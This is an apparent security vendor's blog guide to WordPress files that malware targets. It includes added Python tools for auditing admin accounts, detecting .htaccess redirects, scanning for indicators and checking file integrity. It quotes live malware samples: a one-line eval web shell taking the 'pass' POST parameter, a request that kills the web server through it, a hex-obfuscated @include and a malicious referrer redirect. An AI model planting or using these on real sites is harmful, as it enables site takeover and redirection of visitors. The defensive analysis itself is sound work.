WordPress has made building websites super easy and has enabled individuals and organizations of any size to have an online presence.
When hosting your WordPress website, taking care of its security is essential. The last thing you want is to wake up in the morning and find your website hacked and all your development and SEO efforts gone down the drain, without you having known anything about it 🙁
Because of its popularity, hackers tend to target WordPress along with its themes & plugins. If they find a vulnerability in one plugin, they can easily exploit almost all the websites that have that plugin installed.
Related Guide – WordPress Malware Removal
Take the recent vulnerability in the Contact Form 7 plugin as an example. It is estimated that over 5 million websites using the Contact Form 7 WordPress plugin were left vulnerable after the vulnerability came to light. The flaw in the plugin allowed attackers to simply upload files of any type, bypassing all restrictions placed on the allowed upload-able file types on a website. Further, it allowed an attacker to inject malicious content such as web shells into sites that were running a Contact Form 7 version below 5.3.1 and had file upload enabled on their forms.
Similarly, there was an LFI vulnerability in the ‘Slider Revolution’ plugin which made it possible for hackers to download wp-config.php from vulnerable WordPress sites. This led to the leak of database credentials, encryption keys, and other sensitive configuration information about a website. This started being referred to as the wp-config.php hack.
In this guide, we’ll talk about all the important files and locations on your WordPress site that may be targeted by hackers & malware.
1) WordPress wp-config.php Hack
wp-config.php is an important file for every WP installation. It is the configuration file used by the site and acts as the bridge between the WP file system and the database. The wp-config.php file contains sensitive information such as:
- Database host
- Username, password, & port number
- Database name
- Security keys for WordPress
- Database table prefix
Related Guide – Complete Step by Step Guide to WordPress Security (Reduce the risk of getting hacked by 90%)
Owing to its sensitive nature, it is a popular target amongst hackers. Last year, a critical flaw was found in the WP plugin Duplicator: an Unauthenticated Arbitrary File Download vulnerability which let hackers download the wp-config.php file.
Once hackers get hold of the database login details via the wp-config.php hack, they try to connect to the database and create fake WP admin accounts for themselves. This gives them full access to the website and the database. Sensitive data such as user passwords, email IDs, files, images, WooCommerce transaction details, and so on are exposed to the hacker. To retain access to your WordPress site, they may also install scripts such as the Filesman backdoor.
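Because the first thing an attacker does with leaked database credentials is add an administrator, the first thing to audit after a suspected wp-config.php leak is the list of administrator accounts. The following is an added example (not from the original article): WordPress stores each user's role in the usermeta table under the key `<prefix>capabilities` (`wp_capabilities` with the default `wp_` prefix) as a serialized PHP array, and the query below lists every user holding the administrator role, newest first, and flags those registered within the last N days for manual verification. An in-memory SQLite database with constructed rows stands in for MySQL here; the query itself is plain SQL and runs unchanged against a real `wp_users`/`wp_usermeta` pair.

```python
"""Audit administrator accounts after a suspected wp-config.php leak.

Added example, not from the article. The SQLite database and its rows are
constructed; against a real site run ADMIN_QUERY on MySQL instead.
"""
import sqlite3
from datetime import datetime, timedelta

DATE_FMT = "%Y-%m-%d %H:%M:%S"
SAMPLE_NOW = datetime(2024, 1, 15, 12, 0, 0)  # fixed clock so the demo is reproducible

# Adjust 'wp_' if your site uses a custom table prefix (it changes the meta_key too).
# Roles are serialized PHP arrays such as a:1:{s:13:"administrator";b:1;}
ADMIN_QUERY = """
SELECT u.ID, u.user_login, u.user_email, u.user_registered
FROM wp_users AS u
JOIN wp_usermeta AS m ON m.user_id = u.ID
WHERE m.meta_key = 'wp_capabilities'
  AND m.meta_value LIKE '%"administrator"%'
ORDER BY u.user_registered DESC
"""


def build_sample_db(now=SAMPLE_NOW):
    """Constructed fixture: a long-standing admin, an editor, and an admin created today."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE wp_users (
            ID INTEGER PRIMARY KEY, user_login TEXT, user_email TEXT, user_registered TEXT);
        CREATE TABLE wp_usermeta (
            umeta_id INTEGER PRIMARY KEY, user_id INTEGER, meta_key TEXT, meta_value TEXT);
    """)
    rows = [
        (1, "siteowner", "owner@example.com", now - timedelta(days=900),
         'a:1:{s:13:"administrator";b:1;}'),
        (2, "writer", "writer@example.com", now - timedelta(days=400),
         'a:1:{s:6:"editor";b:1;}'),
        (3, "wp_support", "noreply@example.net", now - timedelta(hours=3),
         'a:1:{s:13:"administrator";b:1;}'),
    ]
    for uid, login, email, registered, caps in rows:
        db.execute("INSERT INTO wp_users VALUES (?, ?, ?, ?)",
                   (uid, login, email, registered.strftime(DATE_FMT)))
        db.execute("INSERT INTO wp_usermeta (user_id, meta_key, meta_value) VALUES (?, ?, ?)",
                   (uid, "wp_capabilities", caps))
    return db


def find_recent_admins(db, now=SAMPLE_NOW, max_age_days=30):
    """Return (all_admin_logins, recently_registered_admin_logins), newest first."""
    cutoff = (now - timedelta(days=max_age_days)).strftime(DATE_FMT)
    admins = db.execute(ADMIN_QUERY).fetchall()
    # user_registered is 'YYYY-MM-DD HH:MM:SS', so plain string comparison orders correctly
    recent = [login for (_id, login, _email, registered) in admins if registered >= cutoff]
    return [login for (_id, login, _email, _reg) in admins], recent


if __name__ == "__main__":
    all_admins, recent = find_recent_admins(build_sample_db())
    print("administrators:", all_admins)
    print("registered in the last 30 days, verify each one:", recent)
```

Any administrator you do not recognise should be disabled and the incident treated as a full credential compromise: rotate the database password and the security keys in wp-config.php, since the attacker has read both.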
2) WordPress index.php Hacked
The index.php file is the entry point to every WordPress site. Since it runs with every page on your site, hackers inject malicious code into it that affects your whole website.
For instance, the pub2srv malware & Favicon malware hack target index.php files. Researchers at Astra Security were monitoring this widespread malware redirection campaign and saw that malicious code such as @include "\x2f/sgb\x2ffavi\x63on_5\x34e6ed\x2eico"; and the code in the screenshot below was added to index.php files:
Some malware campaigns also rename the index.php file to index.php.bak, causing the website to crash and not load at all.
Such malicious code in the index.php file can cause website visitors to see strange popups or ads, or even be redirected to other spammy sites. To fix such a hack, compare the contents of this file with the original copy released by WordPress.
Related Guide – The Ultimate WordPress hack removal guide
3) WordPress .htaccess File Hacked
The .htaccess file, often found in your WordPress website’s home directory, helps configure the server settings as per the website’s requirements. It is used on Apache servers. The .htaccess file is a very powerful component for controlling your web server’s performance and behavior. It can also be used to control the security of your website. Some common uses of the .htaccess file are:
- Restrict access to certain folders of the site
- Configure the maximum memory usage of the site
- Create Redirects
- Force HTTPS
- Manage Caching
- Prevent a few script injection attacks
- Control maximum file upload sizes
- Stop bots from finding usernames
- Block image hotlinking
- Force automatic downloads of files
- Manage file extensions
However, when a site is under attack, these same features can be turned against it to harvest clicks for the attacker. Often, the .htaccess file is injected with malicious code to redirect users. Sometimes it is used to display spam to users. For instance, look at the code given below:
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]
RewriteRule .* http://MaliciousDomain.tld/bad.php?t=3 [R,L]
The malicious code in the last line redirects user traffic away from the site: visitors arriving from the search engines listed in the RewriteCond lines are sent to http://MaliciousDomain.tld, which then tries to load the bad.php script. If you notice unusual redirects from your site, it is possibly due to the .htaccess file hack. However, if you don’t find the file, or if it’s empty, do not panic, as this file is not mandatory (unless you are using pretty URLs in WordPress).
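The injected block above has a recognisable shape: a chain of RewriteCond lines testing %{HTTP_REFERER} against search-engine names, closed by a RewriteRule whose target is an absolute URL on a host that is not the site's own. The following is an added example, not part of the original article: a small parser that reads an .htaccess text line by line, pairs each RewriteRule with the RewriteCond lines that precede it, and reports rules of that shape. The sample text is constructed from the article's snippet plus the standard WordPress permalink block; MaliciousDomain.tld is the article's placeholder.

```python
"""Flag referrer-conditioned redirects to external hosts in an .htaccess file.

Added example; the sample .htaccess below is constructed for the demo.
"""
import re
from urllib.parse import urlparse

SAMPLE_HTACCESS = """\
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]
RewriteRule .* http://MaliciousDomain.tld/bad.php?t=3 [R,L]
"""

# RewriteCond <TestString> <CondPattern> [flags]  /  RewriteRule <Pattern> <Substitution> [flags]
_DIRECTIVE = re.compile(
    r"^\s*(RewriteCond|RewriteRule)\s+(\S+)\s+(\S+)(?:\s+\[([^\]]*)\])?", re.IGNORECASE)


def find_referrer_redirects(htaccess_text, site_host=None):
    """Return [(line_no, target_url, referrer_patterns)] for suspicious rules.

    site_host, if given, lets redirects to the site's own hostname pass.
    """
    findings = []
    pending_conds = []  # RewriteCond lines seen since the last RewriteRule
    for line_no, line in enumerate(htaccess_text.splitlines(), 1):
        m = _DIRECTIVE.match(line)
        if not m:
            continue  # comments, <IfModule>, RewriteEngine, etc.
        directive, arg1, arg2 = m.group(1).lower(), m.group(2), m.group(3)
        if directive == "rewritecond":
            pending_conds.append((arg1, arg2))
            continue
        # A RewriteRule consumes every RewriteCond that precedes it.
        conds, pending_conds = pending_conds, []
        referrer_patterns = [p for (test_string, p) in conds if "http_referer" in test_string.lower()]
        target = urlparse(arg2)  # for RewriteRule, arg2 is the substitution
        external = (target.scheme in ("http", "https") and bool(target.netloc)
                    and (site_host is None or target.netloc.lower() != site_host.lower()))
        if referrer_patterns and external:
            findings.append((line_no, arg2, referrer_patterns))
    return findings


if __name__ == "__main__":
    for line_no, url, patterns in find_referrer_redirects(SAMPLE_HTACCESS):
        print(f"line {line_no}: redirect to {url} when referrer matches {patterns}")
```

The standard permalink block is left alone because its conditions test %{REQUEST_FILENAME}, not the referrer, and its targets are local paths. Run the function over every .htaccess in the tree, not only the one in the document root, since Apache merges them per directory.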
4) WordPress footer.php & header.php (WordPress Theme Files Hacked)
Each WordPress theme has files called footer.php and header.php which hold the code for the footer and header of the site. This area includes scripts & certain widgets which remain the same throughout the website, for example the share widget or the social media widgets at the bottom of your website, or at times just copyright info, credits, etc.
So, these two files are important files that can be targeted by attackers. They are often used for malware redirects and for displaying spam content, as was the case with the digestcolect[.com] Redirect Malware.
Hacked sites might contain gibberish code in these files as you can see in the screenshot below:
We decoded some of this and found hackers leveraging browser cookies to identify users and show them malicious advertisements, among other things.
Moreover, in another instance, the attackers injected JavaScript code into all files with a .js extension. Because of the large scale of such an infection, it often becomes difficult to clean such hacks.
5) WordPress functions.php Hacked
The functions file within the theme folder behaves as a plugin would, which means it can be used to add extra features and functionality to the WordPress site. The file functions.php can be used for:
- Calling WordPress events/functions
- Calling native PHP functions
- Defining your own functions
The functions.php file is present in every theme, but it is important to note that at any given time only one functions.php file is executed: the one in the active theme. Because of this, functions.php files were actively targeted by attackers in the Wp-VCD Backdoor Hack. This malware created new admins and injected spam pages into the site, such as Pharma and Japanese SEO spam.
<?php if (file_exists(dirname(__FILE__) . '/class.theme-modules.php')) include_once(dirname(__FILE__) . '/class.theme-modules.php'); ?>
As is evident from the code above, this file includes the class.theme-modules.php file. That file is then used to install the malware into the other themes installed on your site (even if they are disabled), creating new users and backdoors. This allowed attackers to access the site even after the file was cleaned up.
6) WordPress wp-load.php Hacked
wp-load.php is an important file for every WordPress site. It helps bootstrap the WordPress environment and gives plugins the ability to use the native WP core functions. Many malware variants infect WordPress sites by creating malicious wp-load files, as was seen in the case of the China Chopper web shell malware. Its typical behavior was to create files like wp-load-eFtAh.php on the server. Since the name resembles the original file’s name, you may not have found it suspicious when logged in over FTP. These files would contain code such as:
<?php /*5b7bdc250b181*/ ?><?php @eval($_POST['pass']);?>
This code allows the attacker to run any PHP code on the site that is sent in the pass parameter. Using this backdoor, harmful commands could be executed. For instance, the request http://yoursite/your.php?pass=system("killall -9 apache"); could kill the web server processes and shut down the entire server. Don’t judge this code by its length: it is dangerous enough to control your server remotely.
7) Flood of class-wp-cache.php Files on the Server
In one of the recent hacks we’ve seen, cPanel and the entire web server were filled with dozens or even thousands of class-wp-cache.php files. Every folder of the website, including the core folders, was infected with these malicious files. Usually, the cause of this infection is a vulnerability in the website code that opens an inlet for hackers.
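Sections 2, 5, 6 and 7 above each describe a file-level indicator: a hex-escaped @include in index.php, a functions.php that pulls in class.theme-modules.php, a look-alike wp-load-*.php that evals request input, and class-wp-cache.php files scattered through the tree. The following is an added triage scanner (not tooling from the article or from Astra) that walks a WordPress directory and reports all four shapes. A small sample tree is constructed in a temporary directory so the scan runs offline; its file contents reuse the indicator strings quoted in this article, and the theme and plugin names in it are made up.

```python
"""Triage scan for the file-level indicators described in the article.

Added example. SAMPLE_TREE is a constructed fixture; point scan_tree() at a real
site root to use it for triage.
"""
import os
import re
import tempfile

CONTENT_INDICATORS = {
    # request input passed straight to eval() or a command-execution function
    "eval_of_request_input": re.compile(
        r"\b(?:eval|assert|system|passthru|shell_exec|exec)\s*\(\s*"
        r"(?:stripslashes\s*\(\s*)?\$_(?:POST|GET|REQUEST|COOKIE)\b", re.IGNORECASE),
    # include/require whose argument is built from hex escapes (favicon-malware style)
    "hex_escaped_include": re.compile(
        r"\b(?:include|include_once|require|require_once)\b[^;]*\\x[0-9a-f]{2}", re.IGNORECASE),
    # the Wp-VCD loader that functions.php is made to include
    "wp_vcd_loader": re.compile(r"class\.theme-modules\.php", re.IGNORECASE),
}
# file names that imitate core files (wp-load-<random>.php) or the class-wp-cache.php flood
LOOKALIKE_NAMES = re.compile(r"^(?:wp-load-.+\.php|class-wp-cache\.php)$", re.IGNORECASE)

# Constructed sample tree; paths are relative to the site root.
SAMPLE_TREE = {
    "index.php": r'<?php @include "\x2f/sgb\x2ffavi\x63on_5\x34e6ed\x2eico"; ?>' "\n"
                 "<?php /* the rest of the genuine index.php would follow */ ?>",
    "wp-load.php": "<?php /* stand-in for the real bootstrap file */ "
                   "require_once __DIR__ . '/wp-config.php'; ?>",
    "wp-load-eFtAh.php": "<?php /*5b7bdc250b181*/ ?><?php @eval($_POST['pass']);?>",
    "wp-content/themes/sometheme/functions.php":
        "<?php if (file_exists(dirname(__FILE__) . '/class.theme-modules.php')) "
        "include_once(dirname(__FILE__) . '/class.theme-modules.php'); ?>",
    "wp-content/uploads/2024/class-wp-cache.php": "<?php /* dropped file */ ?>",
    "wp-content/plugins/good/good.php": "<?php echo esc_html( wp_unslash( $_GET['q'] ) ); ?>",
}


def scan_tree(root):
    """Return a sorted list of (relative_path, indicator) pairs."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            if LOOKALIKE_NAMES.match(name):
                findings.append((rel, "lookalike_core_filename"))
            if not name.lower().endswith(".php"):
                continue
            with open(path, encoding="utf-8", errors="replace") as fh:
                text = fh.read()
            for label, pattern in CONTENT_INDICATORS.items():
                if pattern.search(text):
                    findings.append((rel, label))
    return sorted(findings)


def build_sample_tree():
    """Write SAMPLE_TREE into a fresh temporary directory and return its path."""
    root = tempfile.mkdtemp(prefix="wp-scan-demo-")
    for rel, content in SAMPLE_TREE.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(content)
    return root


def scan_sample():
    """Build the constructed tree and scan it."""
    return scan_tree(build_sample_tree())


if __name__ == "__main__":
    for rel, label in scan_sample():
        print(f"{label:26} {rel}")
```

Pattern matching like this is a triage aid, not a verdict: base64-encoded payloads, variable function names and string concatenation all slip past these expressions, and the plugin file in the sample shows that merely reading $_GET is not an indicator. Treat every hit as something to compare against a known-good copy rather than something to delete blindly.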
How to Perform a WordPress Files Cleanup & Secure them
1) Cleaning files
First, investigate the cause of attacks like the wp-config.php hack, then remove the malicious/gibberish code. Second, restore the infected files from a backup if you have one. If no backup is available, you can check the original WordPress files on GitHub. Don’t forget to keep a backup of the files before you make any changes, as any mistake in the code removal process can potentially break your site.
2) Securing the site using plugins
With such hacks, core CMS files are often modified by hackers. It is important to check if any of your core WordPress files are modified. Astra Security customers already have this feature and are notified automatically if any such changes are detected.
Astra Security also provides an inbuilt review mechanism for reviewing these file changes.
After you’ve reviewed the changes in core system files, you would have to scan your site with a Malware Scanning solution such as Astra Website Protection to identify files with malicious content in them. Such tools give you a full scan report of the malware files, malicious links, reasons for the hack, etc.
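The core-file change detection described above comes down to a baseline and a comparison, and it is worth having a version of it you can run yourself even without a vendor's dashboard. The following is an added example (not the Astra feature): a first run records the SHA-256 of every file under the site root in a JSON manifest, and later runs diff the current tree against it and list modified, added and removed paths. The demo builds a tiny constructed site in a temporary directory, takes a baseline, then replays the changes this article describes: an altered index.php, a dropped wp-load-eFtAh.php, a class-wp-cache.php appearing under uploads, and a deleted theme file. All file names in the demo tree are constructed.

```python
"""Baseline-and-compare file integrity check for a WordPress install.

Added example. Keep the manifest outside the web root: an attacker who can write
PHP files can also edit a manifest stored beside them.
"""
import hashlib
import json
import os
import tempfile


def hash_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root, skip_dirs=("wp-content/cache",)):
    """Map relative path -> sha256 for every file under root, pruning volatile dirs."""
    manifest = {}
    for dirpath, dirs, files in os.walk(root):
        rel_dir = os.path.relpath(dirpath, root).replace(os.sep, "/")
        rel_dir = "" if rel_dir == "." else rel_dir
        # Editing dirs in place stops os.walk from descending into pruned directories.
        dirs[:] = [d for d in dirs if (f"{rel_dir}/{d}" if rel_dir else d) not in skip_dirs]
        for name in files:
            rel = f"{rel_dir}/{name}" if rel_dir else name
            manifest[rel] = hash_file(os.path.join(dirpath, name))
    return manifest


def compare(baseline, current):
    """Return {'modified': [...], 'added': [...], 'removed': [...]} with sorted paths."""
    return {
        "modified": sorted(p for p in baseline if p in current and baseline[p] != current[p]),
        "added": sorted(p for p in current if p not in baseline),
        "removed": sorted(p for p in baseline if p not in current),
    }


def save_manifest(manifest, path):
    with open(path, "w", encoding="utf-8") as fh:
        json.dump(manifest, fh, indent=1, sort_keys=True)


def load_manifest(path):
    with open(path, encoding="utf-8") as fh:
        return json.load(fh)


def _write(root, rel, content):
    path = os.path.join(root, *rel.split("/"))
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "w", encoding="utf-8") as fh:
        fh.write(content)


def demo():
    """Constructed site, baseline, simulated compromise, report."""
    site = tempfile.mkdtemp(prefix="wp-site-")
    _write(site, "index.php", "<?php require __DIR__ . '/wp-blog-header.php'; ?>")
    _write(site, "wp-load.php", "<?php /* stand-in bootstrap */ ?>")
    _write(site, "wp-content/themes/sample/functions.php", "<?php ?>")
    _write(site, "wp-content/themes/sample/readme.txt", "sample theme")
    _write(site, "wp-content/cache/page.html", "cached output, expected to churn")

    manifest_path = os.path.join(tempfile.mkdtemp(prefix="wp-manifest-"), "manifest.json")
    save_manifest(build_manifest(site), manifest_path)  # baseline, stored outside the site

    # Simulated changes, patterned on the hacks described in this article.
    _write(site, "index.php", "<?php /* injected line */ ?>\n"
                              "<?php require __DIR__ . '/wp-blog-header.php'; ?>")
    _write(site, "wp-load-eFtAh.php", "<?php /* backdoor stand-in */ ?>")
    _write(site, "wp-content/uploads/2024/class-wp-cache.php", "<?php ?>")
    os.remove(os.path.join(site, "wp-content", "themes", "sample", "readme.txt"))
    _write(site, "wp-content/cache/page.html", "new cached output, ignored by the check")

    return compare(load_manifest(manifest_path), build_manifest(site))


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

Take the baseline immediately after a clean install or a verified cleanup, not on a site you already suspect. For the core files alone, WP-CLI's `wp core verify-checksums` compares the install against the checksums WordPress publishes for each release, which is a useful second opinion; the manifest approach above additionally covers themes, plugins and anything dropped into uploads.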
3) Hide sensitive files
Exposing files to prying eyes can reveal sensitive info, as we discussed with the wp-config.php hack in this article. Therefore, it becomes necessary to hide these files on the server. The .htaccess file can help in securing these files.
To prevent anyone from accessing any PHP files in the wp-content/uploads folder, you can create an .htaccess file in the wp-content/uploads folder and add the following code to it:
# Kill PHP Execution
<Files ~ ".ph(?:p[345]?|t|tml)$">
deny from all
</Files>
To hide sensitive files in the wp-includes folder, add the following code to the .htaccess file in the root of your site:
# Block wp-includes folder and files
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^wp-admin/includes/ - [F,L]
RewriteRule !^wp-includes/ - [S=3]
RewriteRule ^wp-includes/[^/]+\.php$ - [F,L]
RewriteRule ^wp-includes/js/tinymce/langs/.+\.php - [F,L]
RewriteRule ^wp-includes/theme-compat/ - [F,L]
</IfModule>
You can also choose to skip this entire process and just install the WP Hardening Plugin. This plugin hides sensitive files and folders such as wp-content, wp-content/uploads, etc. with just the toggle of a button. In addition, WP-Hardening also helps secure several other important areas of your website, making it hard for attackers to identify sensitive information and exploit it.
Related Guide – Step by Step Guide to WordPress Malware Removal
4) Updating WordPress
Always keep your WP installation, its plugins, and themes up to date. A good number of loopholes can be plugged by running an updated installation. Use reputed plugins and themes only. Avoid poorly coded or nulled themes. This keeps attacks like the wp-config.php hack at bay.
To explain this better, we created a complete step by step video to secure your WordPress site:
5) Use a WordPress Firewall
A firewall goes a long way in securing your site. A firewall can monitor the incoming traffic to your site and take preventive measures to block infection. It can effectively prevent attacks like the wp-config.php hack. There are multiple cost-effective firewall solutions available in the market today. The one at Astra Security is flexible and suitable for your needs.
The Astra firewall stops attacks such as SQLi, code injection, XSS, CSRF, and 100+ other cyber threats in real-time. It also detects and blocks unusual and fake logins to your instance and scans your website automatically and regularly.
6) WordPress Security Audit or Pen testing
With WordPress being the most popular CMS in use, and thus a magnet for security issues, attackers are always on the prowl for exploitable vulnerabilities on WordPress websites. Consequently, pen-testing a WordPress site has become essential in order to keep it secure from attacks.
Penetration Testing is a simulated attack performed against a web application, network, or computer system to evaluate its security and find any vulnerabilities it has before an attacker does, thus helping to protect it. One of the simulated attacks carried out while pen-testing a WordPress site is to check for a Directory Listing vulnerability, which indexes sensitive directories and files such as wp-includes, wp-index.php, wp-config.php, wp-admin, wp-load.php, wp-content, etc. and could thus provide an attacker with sensitive information.
Fix 12+ security issues with a click using our Free WP Hardening Plugin
Related Guide – Complete Step by Step Guide to WordPress Security (Reduce the risk of getting hacked by 90%)
Hello, really post, please I have a question. How can I exploit a WordPress site where wp-content/upload indexing is enabled?
Hello Hendrick! You can read this article for more information: https://www.getastra.com/blog/cms/wordpress-security/hide-wp-includes-wp-content-uploads-from-your-wordpress-site/
Hello,
I am not sure what’s going on, so I’m seeking your help.
When logging in through the admin panel, I am able to see my dashboard; however, I am unable to edit or click on any other link within the dashboard, this gives me a page not found message.
I’ve looked at possible solutions such as updating the .htaccess file
From
<FilesMatch ".*\.(phtml|php)$">
Order Allow,Deny
Deny from all
</FilesMatch>
<FilesMatch "(index).php$">
Order Allow,Deny
Allow from all
</FilesMatch>
To
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
This did the trick; however, the .htaccess file is overridden in a couple of minutes with the first part again. I’d like to not continue to modify the .htaccess file every time I need to make a change to a post or view a plugin on the backend.
Please help.